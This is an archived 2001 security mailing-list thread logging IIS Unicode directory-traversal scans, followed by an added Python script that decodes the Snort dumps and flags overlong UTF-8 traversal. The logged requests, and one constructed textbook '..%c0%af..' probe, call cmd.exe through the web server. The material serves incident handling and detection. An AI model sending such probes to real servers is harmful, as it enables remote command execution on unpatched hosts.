Re: Attempted unicode scans. on network

From: gattacaat_private
Date: Thu Jun 28 2001 - 21:58:42 PDT


    Jason,
    
    I've seen this address (202.96.119.134 CHINANET Zhejiang province network) 
    and many like it. The machines on my WAN get swept hundreds of times per day. 
    Not too long ago someone on this list was good enough to break out the address 
    blocks for my ACLs. I apologize for not giving that person credit as their 
    name escapes me at the moment. If you are interested I can send this to 
    you if it would help.
    
    cheers,
    gattaca
    
    ----------------------
    liquidmatrix.Org
    ----------------------
    
    <orig>
    Okay though, you have probably seen this 200 or 300 times over. Though I 
    just wanted to add this for anyone who is keeping a database of incidents.
    
    On Jun 26, 2001 we received the following vulnerability scan on our servers, 
    which lasted approximately 22 minutes and attempted to connect to every 
    server we have.
    
    Though I would like to know if anyone else was hit by this person?
    
    Jason
    
    TRACE
    
    [**] WEB-MISC http directory traversal [**]
    Jun 26,01 02:54:48am	202.96.119.134:38331 -> x.x.x.x:80
    TTL: 234	TOS: 0x0	ID:60075
    ***AP*** Seq: 1161185518 Ack: 1704311082 Win: 8760
    
    474554202F736372697074732F2E2E25632E2E2F	GET./scripts/..%c../
    77696E6E742F73797374656D33322F636D642E65	winnt/system32/cmd.e
    78653F2F632B64697220485454502F312E300D0A	xe?/c+dir.HTTP/1.0..
    0D0A                                    	....................
    
    [snip]
    
    [**] WEB-FRONTPAGE fourdots request [**]
    Jun 26,01 02:58:08am	202.96.119.134:54761 -> x.x.x.x:80
    TTL: 234	TOS: 0x0	ID:44929
    ***AP*** Seq: 794224914 Ack: 2261806000 Win: 8760
    
    474554202F6D736164632F2E2E2565302E2E2F2E	GET./msadc/..%e0../.
    2E662E2E2E2E2F2E2E3025382E2E2F77696E6E74	.f..../..0%8../winnt
    2F73797374656D33322F636D642E6578653F2F63	/system32/cmd.exe?/c
    2B64697220485454502F312E300D0A0D0A      	+dir.HTTP/1.0.......
    
    [snip]
    
    
    
    ---
    Jason Robertson                
    Network Analyst            
    jasonat_private    
    http://www.astroadvice.com      
    </orig>
    Free, encrypted, secure Web-based email at www.hushmail.com
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
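The two Snort dumps in Jason's post are the payloads of IIS "Web Server Folder Traversal" probes: requests for cmd.exe that reach outside the web root by encoding '/' or '\' as an overlong UTF-8 sequence (%c0%af, %c1%9c, %e0%80%af) that unpatched IIS 4.0/5.0 decoded, fixed in MS00-078. The script below is an added example, not code from the original posting or from either poster. It rebuilds each request from the hex column of the dump exactly as it appears above, percent-decodes the path, and then decodes it the way a permissive decoder would, flagging overlong sequences, ".." traversal and the cmd.exe target. Note that the hex as posted carries "%c" and "%e0" without a complete escape sequence, so those paths decode as literal text; a third request, the textbook "..%c0%af../" form, is constructed here (it is not from the post) to show the overlong case and how a strict UTF-8 decoder rejects it.

```python
"""Decode and classify IIS Unicode-traversal probes from a Snort dump.

Added example, not code from the original posting. The two dumps are copied
from the post above; CONSTRUCTED_PROBE is a made-up canonical MS00-078 probe.
"""
import binascii
import re
from urllib.parse import unquote_to_bytes

HEX_COLUMN = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")
DOTDOT_SEP = re.compile(r"\.\.[/\\]")  # '..' directly followed by a separator

# Snort payload dumps as posted: hex column, then Snort's ASCII rendering.
PAGE_DUMP_SCRIPTS = """\
474554202F736372697074732F2E2E25632E2E2F    GET./scripts/..%c../
77696E6E742F73797374656D33322F636D642E65    winnt/system32/cmd.e
78653F2F632B64697220485454502F312E300D0A    xe?/c+dir.HTTP/1.0..
0D0A                                        ....................
"""
PAGE_DUMP_MSADC = """\
474554202F6D736164632F2E2E2565302E2E2F2E    GET./msadc/..%e0../.
2E662E2E2E2E2F2E2E3025382E2E2F77696E6E74    .f..../..0%8../winnt
2F73797374656D33322F636D642E6578653F2F63    /system32/cmd.exe?/c
2B64697220485454502F312E300D0A0D0A          +dir.HTTP/1.0.......
"""
# Constructed request (not from the post): the textbook overlong-'/' probe.
CONSTRUCTED_PROBE = b"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"


def snort_dump_to_bytes(dump: str) -> bytes:
    """Rebuild the payload from the hex column of a Snort '-d' style dump.

    Only the hex column is trusted: Snort prints non-printable bytes in the
    ASCII column as '.', so that column cannot be decoded faithfully.
    """
    hex_parts = []
    for line in dump.splitlines():
        fields = line.split()
        if fields and HEX_COLUMN.match(fields[0]):
            hex_parts.append(fields[0])
    return binascii.unhexlify("".join(hex_parts))


def lenient_utf8(data: bytes) -> tuple:
    """Decode like a permissive decoder (IIS 4/5 before MS00-078).

    Overlong two- and three-byte sequences map to the code point they encode
    instead of being rejected; the returned flag reports whether any were
    seen. Other malformed bytes become U+FFFD.
    """
    out, overlong, i, n = [], False, 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < n and data[i + 1] & 0xC0 == 0x80:
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            overlong |= cp < 0x80          # %c0%af -> '/', %c1%9c -> '\'
            out.append(chr(cp))
            i += 2
        elif (0xE0 <= b <= 0xEF and i + 2 < n
              and data[i + 1] & 0xC0 == 0x80 and data[i + 2] & 0xC0 == 0x80):
            cp = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            overlong |= cp < 0x800         # %e0%80%af -> '/'
            out.append(chr(cp))
            i += 3
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out), overlong


def analyze_request(raw: bytes) -> dict:
    """Parse the HTTP request line and report traversal indicators."""
    request_line = raw.split(b"\r\n", 1)[0]
    fields = request_line.split(b" ")
    if len(fields) < 2:
        raise ValueError("not an HTTP request line: %r" % request_line)
    path = fields[1].split(b"?", 1)[0]           # drop the ?/c+dir query
    raw_bytes = unquote_to_bytes(path)            # bytes in, bytes out
    decoded, overlong = lenient_utf8(raw_bytes)
    try:                                          # what a strict decoder says
        raw_bytes.decode("utf-8")
        strict_rejects = False
    except UnicodeDecodeError:
        strict_rejects = True
    return {
        "method": fields[0].decode("latin-1"),
        "raw_path": path.decode("latin-1"),
        "decoded_path": decoded,
        "traversal": bool(DOTDOT_SEP.search(decoded)),
        "overlong_utf8": overlong,
        "strict_utf8_rejects": strict_rejects,
        "targets_cmd_exe": "cmd.exe" in decoded.lower(),
    }


def analyze_dump(dump: str) -> dict:
    """Convenience wrapper: Snort dump text straight to the report."""
    return analyze_request(snort_dump_to_bytes(dump))


if __name__ == "__main__":
    for label, report in (("scripts (as posted)", analyze_dump(PAGE_DUMP_SCRIPTS)),
                          ("msadc (as posted)", analyze_dump(PAGE_DUMP_MSADC)),
                          ("constructed %c0%af", analyze_request(CONSTRUCTED_PROBE))):
        print(label, report)
```

The design point is the split between `lenient_utf8` and the strict `.decode("utf-8")`: the probe only works against a decoder that accepts overlong forms, so a detector that normalises the path with a strict decoder never sees the '/' and misses the traversal, while one that decodes leniently both flags the overlong bytes and exposes the "../../" the server would actually have followed.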
    



    This archive was generated by hypermail 2b30 : Fri Jun 29 2001 - 08:32:43 PDT